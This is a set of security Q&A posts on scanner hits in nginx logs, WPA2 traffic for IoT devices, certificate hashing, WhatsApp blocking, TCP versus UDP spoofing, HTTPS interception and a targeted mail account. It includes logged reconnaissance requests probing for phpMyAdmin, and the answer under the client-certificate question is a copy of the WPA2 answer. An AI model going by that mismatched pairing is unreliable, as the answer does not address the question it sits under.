165,338 | This morning I checked our nginx logs. 46.x.x.90 - - [17/Jul/2017:05:51:31 +0000] "HEAD http://x.x.71.1:80/PMA2011/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:31 +0000] "HEAD http://x.x.71.1:80/PMA2012/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:31 +0000] "HEAD http://x.x.71.1:80/PMA2013/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:32 +0000] "HEAD http://x.x.71.1:80/PMA2014/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:32 +0000] "HEAD http://x.x.71.1:80/PMA2015/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:32 +0000] "HEAD http://x.x.71.1:80/PMA2016/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:32 +0000] "HEAD http://x.x.71.1:80/PMA2017/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:32 +0000] "HEAD http://x.x.71.1:80/PMA2018/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:32 +0000] "HEAD http://x.x.71.1:80/pma2011/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:32 +0000] "HEAD http://x.x.71.1:80/pma2012/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:33 +0000] "HEAD http://x.x.71.1:80/pma2013/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:33 +0000] "HEAD http://x.x.71.1:80/pma2014/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:33 +0000] "HEAD http://x.x.71.1:80/pma2015/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:33 +0000] "HEAD http://x.x.71.1:80/pma2016/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:33 +0000] "HEAD http://x.x.71.1:80/pma2017/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:33 +0000] "HEAD http://x.x.71.1:80/pma2018/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:33 +0000] "HEAD http://x.x.71.1:80/phpmyadmin2011/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:33 +0000] "HEAD http://x.x.71.1:80/phpmyadmin2012/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:34 +0000] "HEAD http://x.x.71.1:80/phpmyadmin2013/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:34 +0000] "HEAD http://x.x.71.1:80/phpmyadmin2014/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:34 +0000] "HEAD http://x.x.71.1:80/phpmyadmin2015/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:34 +0000] "HEAD http://x.x.71.1:80/phpmyadmin2016/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:34 +0000] "HEAD http://x.x.71.1:80/phpmyadmin2017/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:34 +0000] "HEAD http://x.x.71.1:80/phpmyadmin2018/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:34 +0000] "HEAD http://x.x.71.1:80/phpmanager/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
139.x.x.135 - - [17/Jul/2017:06:33:53 +0000] "GET / HTTP/1.1"302 219 "-" "Mozilla/5.0 (Windows NT 10.0; W0W64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-"
91.x.x.3 - - [17/Jul/2017:06:49:13 +0000] "GET / HTTP/1.0" 301 185 "-" "-" "-"
38.x.x.164 - - [17/Jul/2017:06:54:55 +0000] "GET / HTTP/1.1" 301 185 "-" "Mozilla/5.0 zgrab/0.x" "-"
91.x.x.3 - - [17/Jul/2017:07:48:04 +0000] "GET / HTTP/1.0" 301 185 "-" "-" "-"
139.x.x.204 - - [17/Jul/2017:08:19:50 +0000] "GET / HTTP/1.1" 302 219 "-" "Mozilla/5.0 (Windows NT 10.0; W0W64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-"
139.x.x.204 - - [17/Jul/2017:08:19:50 +0000] "GET /login HTTP/1.1" 301 185 "-" "Go-http-client/1.1" "-"
139.x.x.204 - - [17/Jul/2017:08:19:51 +0000] "GET /login HTTP/1.1" 200 2222 "http://x.x.71.1/login" "Go-http-client/1.1" "-" Screenshot I suspected an attack since we don't have any of these paths. However, the last one says /login . Now, I'm paranoid and wondering what I could do. Are there any post-attack motions you go through? How could I see if the perpetrator successfully logged in? Who is Jorgee? | Since you have the logs I suggest that you look for usage of the login form. Did the try to login at all? Most often this is just a scan that looks for interesting sites and stores them for later use. This behaviour is extremely common and is common place in almost every http log with a internet facing web service. First of all you should look at the weblogs and see if they actually tried to use the login form at all. If they did, I guess there is some logging done in the web application of that login form? In the log you posted there is only GET requests. Look for POST requests. Jorgee is part of the user agent field and is easily customisable by the web client. | {
"source": [
"https://security.stackexchange.com/questions/165338",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/153532/"
]
} |
165,342 | Shortly: I am working on a project in which several IoT devices are connected to a WPA2 password and MAC filtering protected hotspot. Can the communication in this network be leaked since I do not use TLS? I do not want to use TLS since the resources of my IoT devices are really limited, and implementing TLS would occupy much of them. Therefore, I want to create a private WiFi network, with WPA2 password protection and MAC address filtering, so I can ensure that only devices that I allow are connected. The only question in my mind is, can the information sent over this network be stolen? Does password protection only stops foreign devices to join network or does it encyrpt the data as well? PS: My private WiFi network has no internet connection, it's just Access Point+IoT devices. | Although messages sent over wi-fi are encrypted with a session key, a device that already knows the pre-shared key can decipher the traffic. WPA doesn't implement Forward Secrecy, therefore by owning the pre-shared key anyone can decrypt all the traffic which is not encrypted by upper OSI layer protocols (say, TLS). Therefore, when transferring sensitive data you should use an external data protection mechanism - for example, TLS. | {
"source": [
"https://security.stackexchange.com/questions/165342",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/94078/"
]
} |
165,343 | I am a software developer but a newbie when it comes to online security. Company A has some desktop software used by customers C and D (C unrelated to D). Company B has a web service and has the same C & D customers. C & D need A's software to connect to B's web service and import their specific data. A contacts B and asks what is required to achieve this and is told to do the following:- 1) Create a private key - openssl genrsa -aes256 -out chosencertificatename.key.pem 2048 - (add a password when prompted) 2) Create a CSR - openssl req -key chosencertificatename.pem -new -sha256 -out
chosencertificatename.csr.pem
- (enter relevant information for certificate) 3) Send the CSR to B and get a certificate back - You will be issued with a valid certificate for accessing the APIs. - The certificate chain used to sign the request will also be issued. 4) Associate with you private key using a PKCS12 file - openssl pkcs12 -export -out your_pkcs12_file.p12 -inkey your_private_key_store.pem
-in certificate_sent_from_nucleus.pem 5) Use in your application - Embed the certificate in your application - Each request must contain the Client (X509?) certificate
- Each request must also contain an X-USERNAME header to identify the customer (C and D will be given their own username tokens - plaintext ID?) I am not sure this seems secure since it seems to me that the certificate can only identify that A's software generated the request; the X-Header seems to just identify whose data to return - if C finds out D's X-USERNAME then they can access D's data which seems even less secure than userID/password. Also, is it safe to pass around a certificate that has a private key embedded in it? Edit:
Rereading the instructions sent by B, it appears that A also needs to inform B which customers require access, the reason being that B can write to those customers confirming their permission to access data via the API. Could it be that the certificate returned by B contains an embedded list of the validated X-USERNAMES? | Although messages sent over wi-fi are encrypted with a session key, a device that already knows the pre-shared key can decipher the traffic. WPA doesn't implement Forward Secrecy, therefore by owning the pre-shared key anyone can decrypt all the traffic which is not encrypted by upper OSI layer protocols (say, TLS). Therefore, when transferring sensitive data you should use an external data protection mechanism - for example, TLS. | {
"source": [
"https://security.stackexchange.com/questions/165343",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/153536/"
]
} |
165,543 | There are currently media reports that the Chinese government are blocking some types of messages sent via WhatsApp ("pictures, voice messages and video"). Given that WhatsApp traffic has end-to-end encryption, what mechanisms is it likely that the Chinese government could be using to do this? | Given that Whatsapp traffic has end-to-end encryption, ... End-to-end encryption neither implies anonymity nor that the underlying protocol is unrecognizable to an eavesdropper and doesn't reveal any meta information at all. In fact, obscuring protocols to hide them from firewalls is notoriously difficult and finding out enough to block the traffic can be fairly easy. In the case of WhatsApp, it's also irrelevant that E2EE is used, because WhatsApp adds an extra layer of encryption between client and WhatsApp servers anyway (formerly via TLS, now Noise Pipes ). So the fact that users additionally get E2EE via the Signal protocol has limited impact on traffic analysis. There are some obvious ways to block WhatsApp traffic without having to bother with encryption: Block the servers. WhatsApp publishes the IP pool of their messaging servers. (The IPs used to be listed here and have since been moved to the Facebook Mobile Partner Portal .) But even without a ready-made list of IPs it would be fairly easy to reverse-engineer a list of servers by just using the app and observing the traffic. (That's an entirely common technique - similarly, the Tor network has suffered in the past years from China blocking the majority of their public relays.) Block the protocol. The government could use heuristics to recognize and block the transport protocol. Blocking based on traffic patterns has worked in the past for BitTorrent, Tor and others but might come with a notable overhead. (I can't comment on whether this approach is practical.) One way to block media files in particular would be by identifying large uploads. It might also come in handy that WhatsApp doesn't send images the same way as ordinary text. Instead, clients encrypt and upload attachments separately and then just send a message containing the key to the upload. Since the news report states that no files could be sent at all, it's plausible that the government just temporarily blocked the attachment upload servers (which would leave plain messages unaffected). The process for sending attachments is detailed in the WhatsApp Security Whitepaper : Transmitting Media and Other
Attachments Large attachments of any type (video, audio, images,
or files) are also end-to-end encrypted: The WhatsApp user sending a message (“sender”) generates an
ephemeral 32 byte AES256 key, and an ephemeral 32 byte HMAC-
SHA256 key. The sender encrypts the attachment with the AES256 key in CBC
mode with a random IV, then appends a MAC of the ciphertext using
HMAC-SHA256. The sender uploads the encrypted attachment to a blob store. The sender transmits a normal encrypted message to the recipient
that contains the encryption key, the HMAC key, a SHA256 hash of
the encrypted blob, and a pointer to the blob in the blob store. The recipient decrypts the message, retrieves the encrypted blob
from the blob store, verifies the SHA256 hash of it, verifies the MAC,
and decrypts the plaintext. | {
"source": [
"https://security.stackexchange.com/questions/165543",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/37/"
]
} |
165,559 | I'm looking to renew an SSL (okay, TLS) wildcard certificate with a well-known service. I need to provide a CSR, which I have created using a 2048-bit key. I also need to choose a signature hash. The service offers three choices: SHA-256 , SHA-384 , and SHA-512 . Of these, SHA-256 is the default. This confuses me. Isn't a longer hash presumed to be always stronger? Is there a good reason I might want the smaller 256-bit signature hash over the larger 512 or is this likely just a UI mistake? Are there some applications that can't use 512 bit hashes yet? | From a security perspective, it would be pretty pointless. In practical terms, SHA-256 is just as secure as SHA-384 or SHA-512. We can't produce collisions in any of them with current or foreseeable technology, so the security you get is identical. From a non-security perspective, the reasons to choose SHA-256 over the longer digests are more easily apparent: it's smaller, requiring less bandwidth to store and transmit, less memory and in many cases less processing power to compute. (There are cases where SHA-512 is faster and more efficient.) Third, there are likely compatibility issues. Since virtually no one uses certs with SHA-384 or SHA-512, you're far more likely to run into systems that don't understand them. There are probably fewer issues now than in the past, but again, you're buying yourself risk for no gain. So, at the present time, there are no clear advantages to choosing SHA-384 or SHA-512, but there are obvious disadvantages. This is why SHA-256 is the universal choice for modern certs for websites. | {
"source": [
"https://security.stackexchange.com/questions/165559",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/3594/"
]
} |
165,626 | While reading MS SDL (Microsoft Security Development Lifecycle) presentations I found a recommendation to replace UDP with TCP in applications because TCP is more secure than UDP. But both of them are only transport layers, nothing more. So why is TCP more secure than UDP? | To send data to an application using TCP, you first have to establish a connection. Until the connection is established, packets only get to the OS layer, not the application. Establishing a connection requires that you receive packets back to the initiating end. If you wanted to forge an IP address not on your own network and establish a TCP connection, you'd need to be able to intercept the packets the other side sent out. (you need to be "in between" the endpoint, and where the packets to the forged IP address would normally go, or do some other clever routing tricks.) UDP has no connection, so you can forge a packet with an arbitrary IP address and it should get to the application. You still won't get packets back unless you're in the right "place" of course. Whether this matters or not depends on the security you put in the application. If you were to trust certain IP addresses more than others inside the application, this may be a problem. So in that sense, TCP is more "secure" than UDP. Depending on the application, this may or may not be relevant to security. In and of itself it's not a good reason to replace UDP with TCP since there's other tradeoffs involved between the two protocols. | {
"source": [
"https://security.stackexchange.com/questions/165626",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/122176/"
]
} |
165,649 | After installing Firefox 54.0.1 on my work laptop, the first page I see warns me that "Your connection is not secure" when opening https://www.mozilla.org/ . "The owner of Firefox has configured their website improperly" After browsing a bit more, I noticed that Firefox wasn't just reporting errors for Mozilla. Firefox is reporting HTTPS security errors for Google , Microsoft , Dropbox , GitHub , Wikipedia , LastPass , Netflix , Facebook , Twitter , Skype , WhatsApp , WolframAlpha , Amazon , LinkedIn , AutoHotkey , Yahoo , Imgur , and even Stack Exchange . There are a few things worth noting about these errors. Neither Google Chrome 59.0.3071.115 or Internet Explorer 10.0.9200.22139 report security issues on any of the listed websites A select few sites load in Firefox without reporting any security errors, including Discover , Visa , Mastercard , Chase , American Express , Citibank , Capital One , Bank of America , PayPal , Stripe , Intuit , TreasuryDirect , iCloud * , Discord , and YouTube . ( Concerningly, a majority of the sites which load without reporting any security errors are related to online banking and finance ) I am able to load Mozilla's support page and Wells Fargo without security errors, but the pages render as text without any images or formatting It's worth restating that these security errors are happening on a work-issued laptop, meaning that my employer is most likely scanning HTTPS traffic . While HTTPS scanning can at least partially explain the HTTPS security errors, the situation still leaves me with a few questions. Why is Firefox the only browser reporting these security errors? Why isn't Firefox reporting security errors on banking and financial websites? Why do some pages not report security errors, but only load as plain text? *Note: While iCloud did not report any security errors, the page did eventually fail to load with a connection error . | There is a lot to unpack so I’ll do my best here (based on some assumptions). Firefox maintains its own certificate store which is likely the reason only Firefox is throwing these errors. Traditionally, SysAdmins will push out certificates through Group Policy, which works for both Chrome and IE / Edge but Firefox won’t trust it. I would imagine that your traffic is being intercepted by a transparent proxy server which is inspecting your traffic (note that looking at the certificate information will reveal whether or not this is a certificate that your work has pushed out). Assuming again, but your work is probably explicitly not filtering financial website traffic — presumably to avoid any potential liability with doing so. I have no idea why some load as plain text. This might be something to do with the proxying process. EDIT: As Arminius astutely pointed out , pages loading as plain text is likely due to certificate errors happening with resources being pulled from third party domains. It is likely that the images and CSS are not loading as the cert errors from those domains prevent the resources from being transmitted. | {
"source": [
"https://security.stackexchange.com/questions/165649",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/141087/"
]
} |
165,964 | Intro I have a free mail account on this (german) website. If I type my password wrong I get, once successfully logged in, a message telling me about my failed log-in attempt. Problem Recently I noticed that from day to day the site notifies me of numerous failed log-in attempts (between 8 and 32). There is no feature as in GMail, where location and device of the failed log-in are recorded, so I am a bit in the dark. And also quite worried. Question I have changed my password everday for four days now. Immediately closing the account is not an option since I still have to compile a list where this mail address is used. What appropriate steps to secure my account are to be taken at this point? Update The log-in attempts have declined over the last three days, maxing out at around ten altogether. Yesterday there was no failed log-in attempt logged.
Nevertheless I resorted to your many suggestions and contacted GMX support, but have not heard back from them (certainly not using their 3€/min rip-off hotline) started using a password manager created easy-to-remember-but-hard-to-guess passwords started forwarding mails from the affected account to a more safe mail service learned about 2FA wrote down all the sites and services the affected address is used with, in order to swiftly be able to close my account Since there are many good answers I will wait a few days and mark the one with the most up-votes as the final answer. Thanks for your help! | As far as I can tell, gmx does currently not offer 2FA . That is unfortunate but not necessarily catastrophic. Do you have to use the address to send e-mail? If not you might be able to get around the problem by just forwarding incoming mail to another account, preferably one with 2FA enabled. After you set up a forwarding rule, you can put a really, really long and secure password (50+chars) on the account and save it somewhere safe. Otherwise you'll probably have no real chance to secure the account itself. You are currently using passwords with a length greater than 20 chars, I hope? If not, start doing so immediately. Use a password safe so you don't have to memorize them. Also, please get the gmx security team involved. Probably it's just skiddies or bots (I had an attack like that on an old address I don't use anymore) but if not they might be thankful for a hint. Note that I mentioned using a long password and not one drawing from a large character set. The complexity of the character set does not by itself make your password better. Length runs circles around complexity while juggling chainsaws. See this relevant xkcd comic for a visual explanation. | {
"source": [
"https://security.stackexchange.com/questions/165964",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/155192/"
]
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.